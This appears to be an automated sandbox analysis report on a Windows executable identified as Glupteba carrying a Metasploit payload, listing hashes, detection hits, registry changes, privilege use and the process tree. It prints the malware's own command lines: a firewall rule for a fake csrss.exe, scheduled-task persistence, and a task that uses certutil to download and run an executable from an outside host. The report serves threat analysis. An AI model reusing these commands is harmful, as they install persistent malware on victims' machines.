Analysis
max time kernel: 205s
max time network: 227s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-11-2022 08:53
Static task: static1
Behavioral task: behavioral1
  Sample: c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
  Resource: win10v2004-20221111-en
General
Target: c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
Size: 3.8MB
MD5: 83dac15991d182e1e0996e09d05c358d
SHA1: 597fc6049d50ebbde4d3bc09a5d40ac8ea8caaf2
SHA256: c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae
SHA512: 090576d9e77c794282f3e9f58128be58867ec4a2901853dafd2b53123a09d7c97d7dd28bd8ac66a481713c51c5fe58ad0dac67f4f04ff588721f39d1599714a2
SSDEEP: 98304:Q9BvHl5/baM7kFh4KiCIJPNIm8ouO1ua:Q9F/baM7kTIJlIm8oZ
Malware Config
Extracted: metasploit
Payload: windows/single_exec
Signatures

Glupteba payload (10 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/4908-133-0x00000000048E0000-0x00000000050E2000-memory.dmp | family_glupteba
behavioral2/memory/4908-134-0x0000000000400000-0x00000000025C4000-memory.dmp | family_glupteba
behavioral2/memory/4908-135-0x00000000048E0000-0x00000000050E2000-memory.dmp | family_glupteba
behavioral2/memory/4908-136-0x0000000000400000-0x00000000025C4000-memory.dmp | family_glupteba
behavioral2/memory/4908-138-0x0000000000400000-0x00000000025C4000-memory.dmp | family_glupteba
behavioral2/memory/2236-141-0x0000000000400000-0x00000000025C4000-memory.dmp | family_glupteba
behavioral2/memory/2236-143-0x0000000000400000-0x00000000025C4000-memory.dmp | family_glupteba
behavioral2/memory/2236-147-0x0000000000400000-0x00000000025C4000-memory.dmp | family_glupteba
behavioral2/memory/3220-149-0x0000000000400000-0x00000000025C4000-memory.dmp | family_glupteba
behavioral2/memory/3220-152-0x0000000000400000-0x00000000025C4000-memory.dmp | family_glupteba
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
Processes:
description | pid | process | target process
PID 904 created 4908 | 904 | svchost.exe | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
PID 904 created 3220 | 904 | svchost.exe | csrss.exe
PID 904 created 3220 | 904 | svchost.exe | csrss.exe
PID 904 created 3220 | 904 | svchost.exe | csrss.exe

Executes dropped EXE (2 IoCs)
Processes:
pid | process
3220 | csrss.exe
4088 | patch.exe
Modifies Windows Firewall (1 TTPs, 1 IoCs)

Adds Run key to start application (2 TTPs, 1 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DivineSmoke = "\"C:\\Windows\\rss\\csrss.exe\"" | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Modifies boot configuration data using bcdedit (1 IoCs)
Processes:
pid | process
2640 | bcdedit.exe
Drops file in Windows directory (2 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\rss | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
File created | C:\Windows\rss\csrss.exe | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe

Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2564 | schtasks.exe
2856 | schtasks.exe
Modifies data under HKEY_USERS (64 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" | csrss.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | csrss.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | csrss.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | csrss.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | csrss.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | csrss.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" | csrss.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" | csrss.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | csrss.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
pid | process
4908 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
4908 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
2236 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
2236 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe

Suspicious use of AdjustPrivilegeToken (17 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 4908 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
Token: SeImpersonatePrivilege | 4908 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
Token: SeTcbPrivilege | 904 | svchost.exe
Token: SeTcbPrivilege | 904 | svchost.exe
Token: SeBackupPrivilege | 904 | svchost.exe
Token: SeRestorePrivilege | 904 | svchost.exe
Token: SeBackupPrivilege | 904 | svchost.exe
Token: SeRestorePrivilege | 904 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 3220 | csrss.exe
Token: SeBackupPrivilege | 904 | svchost.exe
Token: SeRestorePrivilege | 904 | svchost.exe
Token: SeBackupPrivilege | 904 | svchost.exe
Token: SeRestorePrivilege | 904 | svchost.exe
Token: SeBackupPrivilege | 904 | svchost.exe
Token: SeRestorePrivilege | 904 | svchost.exe
Token: SeBackupPrivilege | 904 | svchost.exe
Token: SeRestorePrivilege | 904 | svchost.exe

Suspicious use of WriteProcessMemory (18 IoCs)
Processes:
description | pid | process | target process
PID 904 wrote to memory of 2236 | 904 | svchost.exe | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
PID 904 wrote to memory of 2236 | 904 | svchost.exe | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
PID 904 wrote to memory of 2236 | 904 | svchost.exe | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
PID 2236 wrote to memory of 1968 | 2236 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe | cmd.exe
PID 2236 wrote to memory of 1968 | 2236 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe | cmd.exe
PID 1968 wrote to memory of 4240 | 1968 | cmd.exe | netsh.exe
PID 1968 wrote to memory of 4240 | 1968 | cmd.exe | netsh.exe
PID 2236 wrote to memory of 3220 | 2236 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe | csrss.exe
PID 2236 wrote to memory of 3220 | 2236 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe | csrss.exe
PID 2236 wrote to memory of 3220 | 2236 | c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe | csrss.exe
PID 904 wrote to memory of 2856 | 904 | svchost.exe | schtasks.exe
PID 904 wrote to memory of 2856 | 904 | svchost.exe | schtasks.exe
PID 904 wrote to memory of 2564 | 904 | svchost.exe | schtasks.exe
PID 904 wrote to memory of 2564 | 904 | svchost.exe | schtasks.exe
PID 904 wrote to memory of 4088 | 904 | svchost.exe | patch.exe
PID 904 wrote to memory of 4088 | 904 | svchost.exe | patch.exe
PID 3220 wrote to memory of 2640 | 3220 | csrss.exe | bcdedit.exe
PID 3220 wrote to memory of 2640 | 3220 | csrss.exe | bcdedit.exe
Processes
(indentation shows the process tree depth; the number in brackets is the depth shown in the report)

[1] C:\Users\Admin\AppData\Local\Temp\c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 4908

    [2] C:\Users\Admin\AppData\Local\Temp\c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae.exe"
        - Adds Run key to start application
        - Drops file in Windows directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 2236

        [3] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            - Suspicious use of WriteProcessMemory
            PID: 1968

            [4] C:\Windows\system32\netsh.exe
                Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                - Modifies Windows Firewall
                PID: 4240

        [3] C:\Windows\rss\csrss.exe
            Command line: C:\Windows\rss\csrss.exe ""
            - Executes dropped EXE
            - Modifies data under HKEY_USERS
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 3220

            [4] C:\Windows\SYSTEM32\schtasks.exe
                Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                - Creates scheduled task(s)
                PID: 2856

            [4] C:\Windows\SYSTEM32\schtasks.exe
                Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                - Creates scheduled task(s)
                PID: 2564

            [4] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                - Executes dropped EXE
                PID: 4088

            [4] C:\Windows\system32\bcdedit.exe
                Command line: C:\Windows\Sysnative\bcdedit.exe /v
                - Modifies boot configuration data using bcdedit
                PID: 2640

[1] C:\Windows\system32\svchost.exe
    Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 904
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 1.7MB
  MD5: 13aaafe14eb60d6a718230e82c671d57
  SHA1: e039dd924d12f264521b8e689426fb7ca95a0a7b
  SHA256: f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
  SHA512: ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

C:\Windows\rss\csrss.exe
  Filesize: 3.8MB
  MD5: 83dac15991d182e1e0996e09d05c358d
  SHA1: 597fc6049d50ebbde4d3bc09a5d40ac8ea8caaf2
  SHA256: c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae
  SHA512: 090576d9e77c794282f3e9f58128be58867ec4a2901853dafd2b53123a09d7c97d7dd28bd8ac66a481713c51c5fe58ad0dac67f4f04ff588721f39d1599714a2

C:\Windows\rss\csrss.exe
  Filesize: 3.8MB
  MD5: 83dac15991d182e1e0996e09d05c358d
  SHA1: 597fc6049d50ebbde4d3bc09a5d40ac8ea8caaf2
  SHA256: c8b041e2baf61c3da088f2f1e183f3a66e427447fcab580b5e81062026a8faae
  SHA512: 090576d9e77c794282f3e9f58128be58867ec4a2901853dafd2b53123a09d7c97d7dd28bd8ac66a481713c51c5fe58ad0dac67f4f04ff588721f39d1599714a2
Memory dumps

memory/1968-140-0x0000000000000000-mapping.dmp
memory/2236-137-0x0000000000000000-mapping.dmp
memory/2236-147-0x0000000000400000-0x00000000025C4000-memory.dmp
  Filesize: 33.8MB
memory/2236-139-0x000000000430F000-0x00000000046B6000-memory.dmp
  Filesize: 3.7MB
memory/2236-141-0x0000000000400000-0x00000000025C4000-memory.dmp
  Filesize: 33.8MB
memory/2236-143-0x0000000000400000-0x00000000025C4000-memory.dmp
  Filesize: 33.8MB
memory/2564-151-0x0000000000000000-mapping.dmp
memory/2640-155-0x0000000000000000-mapping.dmp
memory/2856-150-0x0000000000000000-mapping.dmp
memory/3220-144-0x0000000000000000-mapping.dmp
memory/3220-148-0x0000000004600000-0x00000000049A7000-memory.dmp
  Filesize: 3.7MB
memory/3220-149-0x0000000000400000-0x00000000025C4000-memory.dmp
  Filesize: 33.8MB
memory/3220-152-0x0000000000400000-0x00000000025C4000-memory.dmp
  Filesize: 33.8MB
memory/4088-153-0x0000000000000000-mapping.dmp
memory/4240-142-0x0000000000000000-mapping.dmp
memory/4908-132-0x0000000004538000-0x00000000048DF000-memory.dmp
  Filesize: 3.7MB
memory/4908-138-0x0000000000400000-0x00000000025C4000-memory.dmp
  Filesize: 33.8MB
memory/4908-136-0x0000000000400000-0x00000000025C4000-memory.dmp
  Filesize: 33.8MB
memory/4908-135-0x00000000048E0000-0x00000000050E2000-memory.dmp
  Filesize: 8.0MB
memory/4908-134-0x0000000000400000-0x00000000025C4000-memory.dmp
  Filesize: 33.8MB
memory/4908-133-0x00000000048E0000-0x00000000050E2000-memory.dmp
  Filesize: 8.0MB